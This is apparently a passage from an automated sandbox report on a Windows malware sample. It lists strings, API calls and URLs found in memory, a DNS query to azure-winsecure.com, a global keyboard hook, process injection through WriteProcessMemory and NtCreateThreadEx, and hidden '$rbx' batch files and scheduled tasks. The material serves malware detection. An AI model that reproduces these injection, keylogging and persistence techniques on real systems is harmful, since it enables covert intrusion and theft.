Source: Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D894 FindFirstFileExW,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D894 FindFirstFileExW,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED894 FindFirstFileExW,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D894 FindFirstFileExW,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D894 FindFirstFileExW,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD894 FindFirstFileExW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD894 FindFirstFileExW,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D894 FindFirstFileExW,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D894 FindFirstFileExW,
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: Microsoft-Windows-LiveId%4Operational.evtx.50.drString found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000002.3019367929.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co9=
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGx
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Installs a global keyboard hook
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0FF4 NtResumeThread,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0F30 NtSetContextThread,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0C6D NtWriteVirtualMemory,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8BE0B8 NtUnmapViewOfSection,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0A4E NtUnmapViewOfSection,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8BE088 NtUnmapViewOfSection,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE42C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE6532300 NtQuerySystemInformation,StrCmpNIW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\20241004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt
Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138DCC94
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138D23F0
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138DCE18
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413902FF0
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413932FF0
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E0CE18
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E0CC94
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E023F0
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E32FF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8BE3D2
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E7CE18
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E7CC94
Source: C:\Windows\System32\conhost.exeCode function: 37_3_0000026504E723F0
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA18
